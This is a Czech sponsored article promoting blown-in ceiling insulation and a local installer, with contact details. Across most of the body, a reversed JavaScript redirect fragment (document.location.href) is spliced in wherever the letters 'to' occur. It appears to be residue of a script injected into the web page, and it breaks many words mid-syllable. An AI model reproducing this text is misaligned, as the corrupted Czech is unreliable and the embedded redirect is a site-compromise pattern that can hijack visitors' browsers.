Rainbow page separator

PR: Potřebujete zateplit strop? Foukaná vata je ideální volbou

Středa, 11. prosince 2019

Starší rodinné domy mají většinou nedostatečnou izolaci, a pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to byste měli uvažovat nad její renovací.

Oblíbenou formou zateplení je v posledních letech foukaná izolace, která má oproti klasickým izolačním materiálům celou řadu předností. V následujících řádcích vám prozradíme, jaké varianty foukané izolace existují a jaké jsou její přednosti.

Zateplení stropu foukanou izolací je rychlá a efektivní me[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toda. Izolace je připravena v balících, které se po[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom vkládají přímo do přístroje, jenž mechanickým dělením unáší vzduchem části izolace, a ty jsou dovedeny potrubím až na mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to aplikace.

Jaké typy foukané izolace existují?
V současné době existují hned tři druhy foukané izolace, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to konkrétně:
Celulóza, což je rozvlákněný novinový papír se směsí zabraňující hoření
Minerální izolace neboli vlákna z horniny čediče
Dřevovláknitá izolace

Jaké jsou výhody foukané izolace?
Ještě než se rozhodnete pro zateplení stropu danou me[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];todou, zřejmě byste si rádi zjistili nějaké výhody o daném materiálu. Foukaná izolace se využívá k zateplení vazníkových krovů, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to z jednoho hlavního důvodu. Právě na krovech jsou těžce dostupná místa, což však u foukané izolace nevadí, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože části se dostanou i do těžce přístupných pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torů. Odpadá vám tak práce se zdlouhavým obřezáváním, které by vás čekalo u ostatních zateplovacích materiálů.

V neposlední řadě vás potěší, že zateplení stropu foukanou izolací je jednoduché. Hlavně nemusíte balíky s materiálem nosit až přímo k místu, kde se bude izolace provádět, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože na konkrétní mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to je izolace přepravena trubicí z místa, kam je jednoduché ji dopravit pomocí mechanizace. Co se týká ceny, ta je více než přijatelná. Samozřejmě záleží na složi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti konkrétní konstrukce a objemu izolovaných pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor.
Obraťte se na odborníky na stránkách www.foukanavata.cz. Technik vás navštíví u vás doma, prohlédne si stavbu a navrhne nejschůdnější způsob zateplení.

Foukaná vata – Michal Došek
Boženy Němcové 341, Polná
Tel.: +420 721 885 381

www.foukanavata.cz
Podívejte se na krátké video z naší montáže

KONTAKTUJTE NÁS PRO NEZÁVAZNOU POPTÁVKU